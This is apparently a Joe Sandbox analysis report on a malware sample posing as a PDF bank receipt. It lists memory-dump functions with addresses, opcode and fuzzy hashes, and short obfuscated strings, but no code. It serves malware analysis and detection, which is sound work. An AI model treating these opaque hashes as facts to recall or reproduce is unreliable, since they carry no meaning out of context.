                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7f508434d0dc87be7d467b30092b9ab892254b00a32225a2d2b50453c9781965
                                                                                                                • Instruction ID: 4d98b545082f62c1c7fbad5bb3ac49de879037f93f68e6e1143fb87328a56866
                                                                                                                • Opcode Fuzzy Hash: 7f508434d0dc87be7d467b30092b9ab892254b00a32225a2d2b50453c9781965
                                                                                                                • Instruction Fuzzy Hash: A0D0A93082220CDFC704EBB8D90A79DBBB49B00202F1001A9C808A32A2EA705E54DBCA
                                                                                                                Function 08271F88 Relevance: .0, Instructions: 14COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 805823888c2f28e10305c737be31ad9e5e95ca5793811b4c7d07df943e715e81
                                                                                                                • Instruction ID: 644ee2f9ea8824e24f73494358ce01fc913b3b84390e07a404f49f7421a9ac91
                                                                                                                • Opcode Fuzzy Hash: 805823888c2f28e10305c737be31ad9e5e95ca5793811b4c7d07df943e715e81
                                                                                                                • Instruction Fuzzy Hash: 0CD0123215020D9E4F80EFA5E800D967BDCBB187507008826E544CB021F721F534E751
                                                                                                                Function 08278E80 Relevance: .0, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1066c04653800d4e5cd3811777b5bf5b767640d826c5a1f7de82f756a4c2700a
                                                                                                                • Instruction ID: a3ae4517c1e4021bb37827203baba425bc04281c748971c7f41f6bcc4262bdd8
                                                                                                                • Opcode Fuzzy Hash: 1066c04653800d4e5cd3811777b5bf5b767640d826c5a1f7de82f756a4c2700a
                                                                                                                • Instruction Fuzzy Hash: D1C08C300402088BC2243798B80C32CF7A8E744203F90C12DE188000238BB140F0C69A

                                                                                                                Non-executed Functions

                                                                                                                Function 082723B8 Relevance: 5.2, Strings: 4, Instructions: 174COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %O@8$%O@8$tQ=)$tQ=)
                                                                                                                • API String ID: 0-749352435
                                                                                                                • Opcode ID: 24b31a6ac88d1d9900a22fee2d4e68cd178672f0f54b624a115e86d55dd83b7c
                                                                                                                • Instruction ID: c5f2e5a3d5e3a793c53b2888f238cd7276182f6b7dfc6e7eed6c181aa225c839
                                                                                                                • Opcode Fuzzy Hash: 24b31a6ac88d1d9900a22fee2d4e68cd178672f0f54b624a115e86d55dd83b7c
                                                                                                                • Instruction Fuzzy Hash: C471C074E21219DFCB48CFAAD58499EFBF1FF88311F14856AE415AB220D774AA41CF50
                                                                                                                Function 08272F68 Relevance: 5.2, Strings: 4, Instructions: 162COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 18'$18'$aY$aY
                                                                                                                • API String ID: 0-3687307736
                                                                                                                • Opcode ID: f23f9d20b714f6b378a7b90ae9501fb94a8dce9e33ec37dc1d219d9cceeaffa0
                                                                                                                • Instruction ID: 73b25671479d1afba378bda3775e7e7650e9f8b625bf1c8f9b8ecd1aadbea088
                                                                                                                • Opcode Fuzzy Hash: f23f9d20b714f6b378a7b90ae9501fb94a8dce9e33ec37dc1d219d9cceeaffa0
                                                                                                                • Instruction Fuzzy Hash: D671E1B4E2120ADFCB04CFAAC5849AEFBB1FF48311F14851AD815AB344D734A982CF95
                                                                                                                Function 082723A8 Relevance: 3.9, Strings: 3, Instructions: 175COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %O@8$tQ=)$tQ=)
                                                                                                                • API String ID: 0-2920369752
                                                                                                                • Opcode ID: ffa4e48ef38f49838cfa824ec6d2b0c93914494086ddf08a85b91b0a224337b1
                                                                                                                • Instruction ID: f232ed0ddbe1c26cc57b223514b74d4ee562264fff208ac5490f3f6a7405e4fb
                                                                                                                • Opcode Fuzzy Hash: ffa4e48ef38f49838cfa824ec6d2b0c93914494086ddf08a85b91b0a224337b1
                                                                                                                • Instruction Fuzzy Hash: 9071F275E2121ADFCB08CFAAD58499EFBF1FF88310F14856AE415AB220D770AA41CF50
                                                                                                                Function 08273A81 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,uRR$6yu[$6yu[
                                                                                                                • API String ID: 0-86511755
                                                                                                                • Opcode ID: 30f6f26d4ec03d071fce150715e6fb76bc3143580d78841e2bca45c061072f2f
                                                                                                                • Instruction ID: ca8864c4c24ab72d3d7cc12978e9aee3ff2276faf95236e9ca53342d534a4636
                                                                                                                • Opcode Fuzzy Hash: 30f6f26d4ec03d071fce150715e6fb76bc3143580d78841e2bca45c061072f2f
                                                                                                                • Instruction Fuzzy Hash: DB41E8B4E2520ADFCB08CFAAC5815AEFBF2EF88301F64D469C405A7358D7349A419B95
                                                                                                                Function 08273A90 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,uRR$6yu[$6yu[
                                                                                                                • API String ID: 0-86511755
                                                                                                                • Opcode ID: 34e4d9b099f516a7d9b05a0fefb9d6b5f33442aad2183e83a19fe36a2716d5a0
                                                                                                                • Instruction ID: ed136662bacfbd486241e7ccc892a8e99b8e642334dbe28b87841b2a342f8abf
                                                                                                                • Opcode Fuzzy Hash: 34e4d9b099f516a7d9b05a0fefb9d6b5f33442aad2183e83a19fe36a2716d5a0
                                                                                                                • Instruction Fuzzy Hash: 2F410DB0E2520ADFCB08CFAAC5415AEFBF2FB88301F60D469C405B7358D7749A419B95
                                                                                                                Function 082769C8 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 9u"K$Zjsq
                                                                                                                • API String ID: 0-1261923490
                                                                                                                • Opcode ID: ab7d4e625d77e2fe8d6bbe63dd2b4d16af8bdfad6ba1554ace5bcc14062f5011
                                                                                                                • Instruction ID: f12a9f58d4fb41bee9bb40be6db4d9c8f96033cc00670c302adf8f95299c0158
                                                                                                                • Opcode Fuzzy Hash: ab7d4e625d77e2fe8d6bbe63dd2b4d16af8bdfad6ba1554ace5bcc14062f5011
                                                                                                                • Instruction Fuzzy Hash: 35C10470E25619DFCB08CFAAD58059EFBF2BF98301F14D52AD419AB228D7709942CF54
                                                                                                                Function 082769B8 Relevance: 2.8, Strings: 2, Instructions: 293COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 9u"K$Zjsq
                                                                                                                • API String ID: 0-1261923490
                                                                                                                • Opcode ID: be0fea0cb5909d17112995bebb45d1726b0192615a0101c899c76a674ec284af
                                                                                                                • Instruction ID: 0c30f88a671d11a24cba29bee2bc48f9c9d17c3f5ba5718d4961313d740b510b
                                                                                                                • Opcode Fuzzy Hash: be0fea0cb5909d17112995bebb45d1726b0192615a0101c899c76a674ec284af
                                                                                                                • Instruction Fuzzy Hash: E2C10470E2561ADFCB08CFAAD58059EFBF2BF98301F14D52AD419AB224D7709942CF54
                                                                                                                Function 08274A68 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \~$$or
                                                                                                                • API String ID: 0-2796768027
                                                                                                                • Opcode ID: 694b2d8542fa0ca5c25ef7e9cfed95f8db7cafacb4e5a35f617d31af1fb2c699
                                                                                                                • Instruction ID: d187383fcb924c17f135e948c365b98c5e70a85e6e0eb3c50f1b23f75352223a
                                                                                                                • Opcode Fuzzy Hash: 694b2d8542fa0ca5c25ef7e9cfed95f8db7cafacb4e5a35f617d31af1fb2c699
                                                                                                                • Instruction Fuzzy Hash: 0A6136B4E2521ADFCB08CFA6D5815AEFBF2EF88301F10902AD415A7354E7349A45CF98
                                                                                                                Function 08274A58 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \~$$or
                                                                                                                • API String ID: 0-2796768027
                                                                                                                • Opcode ID: 325ec7fcf15dc6d7116a5b66bf129694ef8a4b5e463ddf07adece7881f267df2
                                                                                                                • Instruction ID: 3d58bee620eccd17b97182f7edcdee38a7bd367f3c825d0f5c7cdd0751933959
                                                                                                                • Opcode Fuzzy Hash: 325ec7fcf15dc6d7116a5b66bf129694ef8a4b5e463ddf07adece7881f267df2
                                                                                                                • Instruction Fuzzy Hash: 8C6134B4E2521ADFCB08CFA6D5516AEFBF2EF88301F10902AD415A7354E7349A45CF98
                                                                                                                Function 08272F59 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 18'$aY
                                                                                                                • API String ID: 0-535677718
                                                                                                                • Opcode ID: f61be0e28148bde0c5ea49c41c0c358e7da2d5715d99a574cb753ad9479b157d
                                                                                                                • Instruction ID: 60167448a244eff55a04476b27889415b474f88f1d21a4aa12d0274bc35797ca
                                                                                                                • Opcode Fuzzy Hash: f61be0e28148bde0c5ea49c41c0c358e7da2d5715d99a574cb753ad9479b157d
                                                                                                                • Instruction Fuzzy Hash: 3261C2B5E2520ACFCB04CFAAC5849AEFBB2FF48311F14851AD415A7355D334A982CF95
                                                                                                                Function 082763E0 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ?w=>
                                                                                                                • API String ID: 0-1933253675
                                                                                                                • Opcode ID: 4357024eba3f4acce26325e12a302b290639af210707689c7553de952a5023ee
                                                                                                                • Instruction ID: 7f477b6cd25b94569bef12f5a213ed7da69d132438b70bcde7c638f7bb20baa4
                                                                                                                • Opcode Fuzzy Hash: 4357024eba3f4acce26325e12a302b290639af210707689c7553de952a5023ee
                                                                                                                • Instruction Fuzzy Hash: 67B13870D25629DFDB28CFA6D88059EFBB2FF99301F10D02AD419AB225DB349902CF14
                                                                                                                Function 082763D1 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ?w=>
                                                                                                                • API String ID: 0-1933253675
                                                                                                                • Opcode ID: f82a78aa66f3a9ea201a2923b4b73bd8cb650629b98b0b70ad11ce4381bc39ac
                                                                                                                • Instruction ID: a045fc77930107124f6acf3df7b52435e7fa24b02568a26813b3de20dc186987
                                                                                                                • Opcode Fuzzy Hash: f82a78aa66f3a9ea201a2923b4b73bd8cb650629b98b0b70ad11ce4381bc39ac
                                                                                                                • Instruction Fuzzy Hash: 56B14870E25629DFDB28CFA6D88059EFBB2FF99301F10D02AD415AB265DB349902CF14
                                                                                                                Function 08270006 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ]]o
                                                                                                                • API String ID: 0-2636374853
                                                                                                                • Opcode ID: d2289340dccf8183dea136e059393f7172c79ddf45cbbba838d04c1725c85b00
                                                                                                                • Instruction ID: 1b4df8801add39ad85dcd66056bbfd5276d9310d9a8112419573ccf68f4dd7f4
                                                                                                                • Opcode Fuzzy Hash: d2289340dccf8183dea136e059393f7172c79ddf45cbbba838d04c1725c85b00
                                                                                                                • Instruction Fuzzy Hash: CC715A70E2560ADFCB04CFAAC4819AEFBF2FF89311F14806AD400A7251C3749945CF94
                                                                                                                Function 08270040 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ]]o
                                                                                                                • API String ID: 0-2636374853
                                                                                                                • Opcode ID: 0b037014d4a3c4a4ae4f5ba4c8680b74458d797bdfe2380096d4914949b62a74
                                                                                                                • Instruction ID: 36c5d6df4d55f5ca179439785c6dcdb641b9204ecc8daaa4793a1f752230199d
                                                                                                                • Opcode Fuzzy Hash: 0b037014d4a3c4a4ae4f5ba4c8680b74458d797bdfe2380096d4914949b62a74
                                                                                                                • Instruction Fuzzy Hash: F7712674E2160ADFCB08CFAAC4819AEFBF2FB88311F14812AD415A7355D3749A85CF94
                                                                                                                Function 08274703 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: i#)6
                                                                                                                • API String ID: 0-3600651614
                                                                                                                • Opcode ID: 992d59769142e2999167183d8144a033a8d598e9b86be40c0242011206c821d9
                                                                                                                • Instruction ID: cf82f0603290669569b9bbfdbb922c46d96acc860210ae49ed6d6a6caaa72b9e
                                                                                                                • Opcode Fuzzy Hash: 992d59769142e2999167183d8144a033a8d598e9b86be40c0242011206c821d9
                                                                                                                • Instruction Fuzzy Hash: B6415A70E2620ADFCB08DFA6C5416AEFBF1EF85300F24946AC115EB254D3349B45CB99
                                                                                                                Function 08274710 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: i#)6
                                                                                                                • API String ID: 0-3600651614
                                                                                                                • Opcode ID: 6d2e2e3cee79e12ce49d2608a7307d4b593bb9c864162cecf1378324a3a81754
                                                                                                                • Instruction ID: 5c0dc7f2ac28ba70b12ad983463085b708d0b5b417af467f84af2d057bda7898
                                                                                                                • Opcode Fuzzy Hash: 6d2e2e3cee79e12ce49d2608a7307d4b593bb9c864162cecf1378324a3a81754
                                                                                                                • Instruction Fuzzy Hash: 5E411870E2521ADFCB08DFA6C5416AEFBF1EB89301F20942AC115EB254D3749641CF99
                                                                                                                Function 0827D750 Relevance: .3, Instructions: 325COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dcf5a82b1865e0b0f7633b4aaacc421a83d569fc76b6d8342f45c06eea021063
                                                                                                                • Instruction ID: b2db5ab4a7444d569f9072ed3f969e78fbfc88cbb18fd8bbaa6c0326604f737c
                                                                                                                • Opcode Fuzzy Hash: dcf5a82b1865e0b0f7633b4aaacc421a83d569fc76b6d8342f45c06eea021063
                                                                                                                • Instruction Fuzzy Hash: DEE1F874E102598FCB14DFA9C5809AEFBF2FF89305F248169D414AB35AD731A982CF61
                                                                                                                Function 0827DBA8 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b36ab7c48b6b75c10a78056e6c4ae0b18061b1c40c52b01b61f31659814fb86f
                                                                                                                • Instruction ID: 1831ed65d2c1806df13b8a4885ebed34ae598a6ae7224777cd0048561a2bcd8b
                                                                                                                • Opcode Fuzzy Hash: b36ab7c48b6b75c10a78056e6c4ae0b18061b1c40c52b01b61f31659814fb86f
                                                                                                                • Instruction Fuzzy Hash: 6AE1C874E111198FCB14DFA9C5809AEFBF2FF89305F248169D414AB35AD731A982CFA1
                                                                                                                Function 0827DFE0 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 88cb1a63ab93aa2429e0c32e5ee17af568f665595ae4a46f8796dd9aacc7134f
                                                                                                                • Instruction ID: 5191fa4572bf963c08f6b44580d1964b92416848761d1afa0a9564714094f746
                                                                                                                • Opcode Fuzzy Hash: 88cb1a63ab93aa2429e0c32e5ee17af568f665595ae4a46f8796dd9aacc7134f
                                                                                                                • Instruction Fuzzy Hash: 77E1E874E102198FCB14DFA9C5809AEFBF2FF89305F258269D414AB356D731A981CF61
                                                                                                                Function 0827E418 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e1d376787add46b495ab11bc10b1d73e8c22c3180bba26dcce1a21a24e4c46e6
                                                                                                                • Instruction ID: d7bfbe0135d7c612b26b0b9bf081c28243742a8572836135590907dbecdaeb6e
                                                                                                                • Opcode Fuzzy Hash: e1d376787add46b495ab11bc10b1d73e8c22c3180bba26dcce1a21a24e4c46e6
                                                                                                                • Instruction Fuzzy Hash: BAE1F8B4E101198FCB14DFA9C5809AEFBF2FF89305F258169D414AB356D731A982CF61
                                                                                                                Function 060C12F8 Relevance: .3, Instructions: 264COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3cef9f76005de24f01d08315dd385b541b8b0e3361f6be55358da8db59de1ae
                                                                                                                • Instruction ID: 51c61f668ce5fa90fe5236a4ddf8e0af04fb4b9691d8bc752899125460aa1861
                                                                                                                • Opcode Fuzzy Hash: e3cef9f76005de24f01d08315dd385b541b8b0e3361f6be55358da8db59de1ae
                                                                                                                • Instruction Fuzzy Hash: 93D11B31D2071A8ACB01EFA4D990A9DB7B1FF95304F50C79AE44937225EF706AC9CB91
                                                                                                                Function 08273808 Relevance: .2, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 74603fa1a6eb9fd0cb144e1ba6e50d3a5450351651a3fd8386fe77f70707bccb
                                                                                                                • Instruction ID: 1f9af9300e5c234087de3f368850e7ad2b4f9b7004a1131d1490e99c0f2efc66
                                                                                                                • Opcode Fuzzy Hash: 74603fa1a6eb9fd0cb144e1ba6e50d3a5450351651a3fd8386fe77f70707bccb
                                                                                                                • Instruction Fuzzy Hash: 93610474E2520ACFDB08CFAAC5849DEFBF2FF89210F64946AD405B7364D7349A418B64
                                                                                                                Function 08273818 Relevance: .2, Instructions: 167COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e214a94bee4827e11a1376632acc3defde9e1c7430b08cd09f2390da062bd4ac
                                                                                                                • Instruction ID: 22273b7bb7ac7e47a448d53549b16fb9108de3f18d30d57cb04fe02297a76572
                                                                                                                • Opcode Fuzzy Hash: e214a94bee4827e11a1376632acc3defde9e1c7430b08cd09f2390da062bd4ac
                                                                                                                • Instruction Fuzzy Hash: 2D711474E2520ADFDB08CFAAC5849DEFBF2FF89211F64942AD405B7324D7309A418B64
                                                                                                                Function 0827DB98 Relevance: .1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1cec3e6b3f98d59cdd0a4f2e6f06b39f1ae8a4bde9efc394aaebd61d8a3a5471
                                                                                                                • Instruction ID: 5081d935c469954b473376690d2fe88cc70466573a4dbf865304405686c50397
                                                                                                                • Opcode Fuzzy Hash: 1cec3e6b3f98d59cdd0a4f2e6f06b39f1ae8a4bde9efc394aaebd61d8a3a5471
                                                                                                                • Instruction Fuzzy Hash: E0511C74E102198FCB14DFAAC5405AEFBF2EF89305F24C169D458AB35AC7319A42CFA1
                                                                                                                Function 08274EB0 Relevance: .1, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e30edb8ad466301f2142213851b596d437ad558f9edb573c08bad5424a01cc5e
                                                                                                                • Instruction ID: a83daf4ee5cc56bfd896082e1c609eebf78a2ba3b89a8361e01f97d56e31ce7f
                                                                                                                • Opcode Fuzzy Hash: e30edb8ad466301f2142213851b596d437ad558f9edb573c08bad5424a01cc5e
